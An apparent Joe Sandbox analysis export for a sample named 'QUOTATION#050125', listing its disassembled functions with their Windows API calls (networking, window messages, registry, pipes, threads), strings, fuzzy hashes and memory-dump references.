Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysListView32
API String ID: 2326795674-78025650
Opcode ID: b935aff4caa904c886c36ade1845e8341c9391a76168325fd73669f34f7cbbfd
Instruction ID: f61d2f5891dc12aab6ac2664df43dfbf5ea3478b2d838c0689cb0cdece67ec3a
Opcode Fuzzy Hash: b935aff4caa904c886c36ade1845e8341c9391a76168325fd73669f34f7cbbfd
Instruction Fuzzy Hash: 3B41C231A00218BBEF219F64CC49BEA7FA9FF08354F10052AF948E7281D3719D84CB90

Function 005010B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0050304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0050307A

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00501112
WSAGetLastError.WSOCK32 ref: 00501121
WSAGetLastError.WSOCK32 ref: 005011C9
closesocket.WSOCK32(00000000), ref: 005011F9

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorLast$closesocketinet_addrsocket
String ID:
API String ID: 3854663608-0
Opcode ID: 159a6a537ebed84b3b31e6dfba2fe37bec01b2a7082bb7468036d2ac9710b56d
Instruction ID: 9b4e61f3031f7dbf7af2c982dad619d16888e6c16d9324bd3e10d36e638dae3a
Opcode Fuzzy Hash: 159a6a537ebed84b3b31e6dfba2fe37bec01b2a7082bb7468036d2ac9710b56d
Instruction Fuzzy Hash: 8641EF31600604AFDB149F24C884BAEBFA9FF45328F148059FA069B2D1C775AD85CBA6

Function 00512DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00512E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00512E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00512E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00512EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00512EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00512EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00512F0B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: e31d1068f3d138a8ac7bae569b9610cf8f7012bf380953fbbf20771ea899c0ed
Instruction ID: 962289de9c45ca8d3ac95b71fdde3019a490392372bb8acba702b0cbc8558670
Opcode Fuzzy Hash: e31d1068f3d138a8ac7bae569b9610cf8f7012bf380953fbbf20771ea899c0ed
Instruction Fuzzy Hash: D6311530644250AFEB21CF58DC94FA53BE9FBAA711F154264F9148F2B1CB71ACA4EB41

Function 004E7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004E7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004E778F
SysAllocString.OLEAUT32(00000000), ref: 004E7792
SysAllocString.OLEAUT32(?), ref: 004E77B0
SysFreeString.OLEAUT32(?), ref: 004E77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 004E77DE
SysAllocString.OLEAUT32(?), ref: 004E77EC

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 765b3bd74b86c7f6c86987d7f10b23185a22cc51ffb26bb65e48fa8662efffe4
Instruction ID: 432f8780fea5e0f3c41994a042405632c4cb0cce6b13e1792681e8cf3d00d96b
Opcode Fuzzy Hash: 765b3bd74b86c7f6c86987d7f10b23185a22cc51ffb26bb65e48fa8662efffe4
Instruction Fuzzy Hash: EA219076608219AFDF10DFA9CC88CFB7BACEB097657048026FA15DB250D674EC46C768

Function 004E77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004E7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004E7868
SysAllocString.OLEAUT32(00000000), ref: 004E786B
SysAllocString.OLEAUT32 ref: 004E788C
SysFreeString.OLEAUT32 ref: 004E7895
StringFromGUID2.OLE32(?,?,00000028), ref: 004E78AF
SysAllocString.OLEAUT32(?), ref: 004E78BD

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2823f5e88264850b10855798301c72d7cce4d6d211f2230ce4c9356bf5fce511
Instruction ID: 7a28191af1c7e0a321431ed23537c78e8b7e5f53ff8038651608718e4a13c1fd
Opcode Fuzzy Hash: 2823f5e88264850b10855798301c72d7cce4d6d211f2230ce4c9356bf5fce511
Instruction Fuzzy Hash: B321C131608214BFDF10AFA9CC88DAB7BECFB183617108126F914CB2A1D678DC45DB68

Function 004F04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 004F04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004F052E

Strings

nul, xrefs: 004F0567

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: c02c53744cc702a73e791531c58f8f38fc6850d63e6a6893880effdf4b332bb9
Instruction ID: cdf93c8cd730489f54616a5919361047c10441087cc189eac0d77b4df37865b8
Opcode Fuzzy Hash: c02c53744cc702a73e791531c58f8f38fc6850d63e6a6893880effdf4b332bb9
Instruction Fuzzy Hash: F2218075500309ABDF208F29DC04AAA7BA4AF94724F204A1AFEA1D72E1D7B4D944DF24

Function 004F05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004F05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004F0601

Strings

nul, xrefs: 004F0639

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: c5297317eb0e8ccd326d5e71416160860a552c6c5d40bc3fbca1d3c2002f30d6
Instruction ID: 6bbb42644fdd8ce38ef889b592db824f68856259b9cafdd202fcfd3f34ee2fe3
Opcode Fuzzy Hash: c5297317eb0e8ccd326d5e71416160860a552c6c5d40bc3fbca1d3c2002f30d6
Instruction Fuzzy Hash: 9621B575540319ABEB208F69CC04AAB77E4BFD5724F204A1AFEA1E73D1D7B49860CB14

Function 005140AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0048604C
Part of subcall function 0048600E: GetStockObject.GDI32(00000011), ref: 00486060
Part of subcall function 0048600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0048606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00514112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0051411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0051412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00514139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00514145

Strings

Msctls_Progress32, xrefs: 005140E3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: baff5e4b3feed9323fb8668fe30e301ec0627741b62e06693d27a34c67a482d4
Instruction ID: 0c3214a778b071460d5693094660d498cf52f0812b025cf12fe9fe75cb6dde1e
Opcode Fuzzy Hash: baff5e4b3feed9323fb8668fe30e301ec0627741b62e06693d27a34c67a482d4
Instruction Fuzzy Hash: CE1190B2180219BEFF219F64CC85EE77F5DFF19798F014111BA18A6050C7769C61DBA4

Function 004A34CD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 004A3535
api-ms-, xrefs: 004A3521

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 948134f934b568d0fe50c3f17eb1ddecda90dd7b04f4291cd20ffd0f6e5336bd
Instruction ID: 811446d0521b34b4b76af3caec4fcc24920fbde0416e030fad3a956ae88aa401
Opcode Fuzzy Hash: 948134f934b568d0fe50c3f17eb1ddecda90dd7b04f4291cd20ffd0f6e5336bd
Instruction Fuzzy Hash: 8D113871E41311BBDB214F2C8C81A5B7B989F377A1F140622FC06A7390F638EE0196E8

Function 004EDE27 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004EDE42
gethostname.WSOCK32(?,00000100), ref: 004EDE5C
gethostbyname.WSOCK32(?), ref: 004EDE69
inet_ntoa.WSOCK32(?), ref: 004EDEAB
WSACleanup.WSOCK32 ref: 004EDEDE

Strings

0.0.0.0, xrefs: 004EDE87

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 348263315-3771769585
Opcode ID: c83e80b08bb0cfa49495658238aa95f6df34f5800ce2ef825f6a23e8f48da6c3
Instruction ID: 05277e1ee1f2057b653e81ce458ac3d9411c1cc04f117fe9fe163c9bdeab047c
Opcode Fuzzy Hash: c83e80b08bb0cfa49495658238aa95f6df34f5800ce2ef825f6a23e8f48da6c3
Instruction Fuzzy Hash: 04113671D00104AFCB20AB36DC4AEEF3BACDF61316F00016FF4059A091EFB98A819A54

Function 004EDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004EDA74
LoadStringW.USER32(00000000), ref: 004EDA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004EDA91
LoadStringW.USER32(00000000), ref: 004EDA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004EDADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004EDAB9

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: e0aad1bbbf99726373d2a7847c01c285e329bfb9b932650e8226fd06b18b13be
Instruction ID: 3a60909790414802bd35d129599e81668a5bf769e9c27010e755e03cc106289d
Opcode Fuzzy Hash: e0aad1bbbf99726373d2a7847c01c285e329bfb9b932650e8226fd06b18b13be
Instruction Fuzzy Hash: F80186F69802087FEB109BA49D89EEB3B6CE708305F4044A6B706E2041E6759E888F75

Function 004F096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0178ED70,0178ED70), ref: 004F097B
EnterCriticalSection.KERNEL32(0178ED50,00000000), ref: 004F098D
TerminateThread.KERNEL32(0178DF10,000001F6), ref: 004F099B
WaitForSingleObject.KERNEL32(0178DF10,000003E8), ref: 004F09A9
CloseHandle.KERNEL32(0178DF10), ref: 004F09B8
InterlockedExchange.KERNEL32(0178ED70,000001F6), ref: 004F09C8
LeaveCriticalSection.KERNEL32(0178ED50), ref: 004F09CF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 665586e9dc8ccf3ab165190395a024528b19d1d178068d0a5bbb87d94572ace8
Instruction ID: 6889ddb5a410f416f7181566da34199c5460dc1b05d3d34885e7a388b19439d0
Opcode Fuzzy Hash: 665586e9dc8ccf3ab165190395a024528b19d1d178068d0a5bbb87d94572ace8
Instruction Fuzzy Hash: C3F08131482612BBD7411F90EE8CBE67F35FF11702F405012F241508A1C77A9469DF90

Function 00485D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00485D30
GetWindowRect.USER32(?,?), ref: 00485D71
ScreenToClient.USER32(?,?), ref: 00485D99
GetClientRect.USER32(?,?), ref: 00485ED7
GetWindowRect.USER32(?,?), ref: 00485EF8

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 765b6ef9cff3d9cf40fb79e517e369fcd6dff2d444f4ab1d55606a4b406cc5ac
Instruction ID: ed68fba2471174161ac4b94d692410c98ccf297859d3be73b28ddc7438fce726
Opcode Fuzzy Hash: 765b6ef9cff3d9cf40fb79e517e369fcd6dff2d444f4ab1d55606a4b406cc5ac
Instruction Fuzzy Hash: D9B17A78A0064ADBDB10DFA8C940BEEB7F1FF54310F14881AE8A9D7250D738AA41DB59

Function 005120FD Relevance: 9.2, APIs: 6, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00512183
GetMenuItemCount.USER32(00000000), ref: 005121B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005121DD
GetMenuItemID.USER32(?,?), ref: 0051224D
GetSubMenu.USER32(?,?), ref: 0051225B

Part of subcall function 004E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004E3A57
Part of subcall function 004E3A3D: GetCurrentThreadId.KERNEL32 ref: 004E3A5E
Part of subcall function 004E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004E25B3), ref: 004E3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005122E3

Part of subcall function 004EE97B: Sleep.KERNEL32 ref: 004EE9F3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow
String ID:
API String ID: 2039446747-0
Opcode ID: 27d09bdc5ba4e55249a45ef92733ca43b84353a3aec42f65995e6deeb30a6240
Instruction ID: 67073b5d05dd43d72c563b55553167283226379d62912a4d6ce41c3789201e29
Opcode Fuzzy Hash: 27d09bdc5ba4e55249a45ef92733ca43b84353a3aec42f65995e6deeb30a6240
Instruction Fuzzy Hash: D5716E75A00205AFDB10EF65C885AEEBBF5BF48314F148859E926EB341D734AD91CB90

Function 0050BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0050C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0050B6AE,?,?), ref: 0050C9B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0050BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0050BD25
RegCloseKey.ADVAPI32(00000000), ref: 0050BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0050BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0050BDF3
RegCloseKey.ADVAPI32(?), ref: 0050BDFF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 679a06980730a90bf68c1ea2c6ce315d21cb93c63f8f1fdb2ac7e04954928ed9
Instruction ID: 1e07c8d22930501180f451f82ebccd8f3aeffcc60b5dcd2408598c58b107eca3
Opcode Fuzzy Hash: 679a06980730a90bf68c1ea2c6ce315d21cb93c63f8f1fdb2ac7e04954928ed9
Instruction Fuzzy Hash: 4D818D71218241AFE714EF24C885E6EBBE5FF84308F14895DF4558B2A2DB32ED45CB92

Function 004DF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 004DF7B9
SysAllocString.OLEAUT32(00000001), ref: 004DF860
VariantCopy.OLEAUT32(004DFA64,00000000), ref: 004DF889
VariantClear.OLEAUT32(004DFA64), ref: 004DF8AD
VariantCopy.OLEAUT32(004DFA64,00000000), ref: 004DF8B1
VariantClear.OLEAUT32(?), ref: 004DF8BB

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 6c213e930122c51e62c31b89082b5fd5302d795b2edd64592123bf629c60f776
Instruction ID: ea4a154c8cd09f01b9e0db6521543d64fa974f50bc405e981ad0ef82b2718a1d
Opcode Fuzzy Hash: 6c213e930122c51e62c31b89082b5fd5302d795b2edd64592123bf629c60f776
Instruction Fuzzy Hash: 3051C371A40310AACF30AB66D8B5729B3A4AF45314B24846BE907DF391D7788C49D79F

Function 0049920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00499BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00499BB2

BeginPaint.USER32(?,?,?), ref: 00499241
GetWindowRect.USER32(?,?), ref: 004992A5
ScreenToClient.USER32(?,?), ref: 004992C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004992D3
EndPaint.USER32(?,?,?,?,?), ref: 00499321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004D71EA

Part of subcall function 00499339: BeginPath.GDI32(00000000), ref: 00499357

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: ec714077ef6c60a51017e31355f158b82f25534c6fb9ba7f2c752645f6c2c3d8
Instruction ID: 6eaf5a2d1a84e747a7ab716ba4021f3370597ec347c3a437f8d7cd70ebefbcea
Opcode Fuzzy Hash: ec714077ef6c60a51017e31355f158b82f25534c6fb9ba7f2c752645f6c2c3d8
Instruction Fuzzy Hash: 0941CF70144300AFDB20DF29CC94FAA7FB8EB5A325F04066EF954872A1C7359C49EB66

Function 004F07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004F080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 004F0847
EnterCriticalSection.KERNEL32(?), ref: 004F0863
LeaveCriticalSection.KERNEL32(?), ref: 004F08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004F08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 004F0921

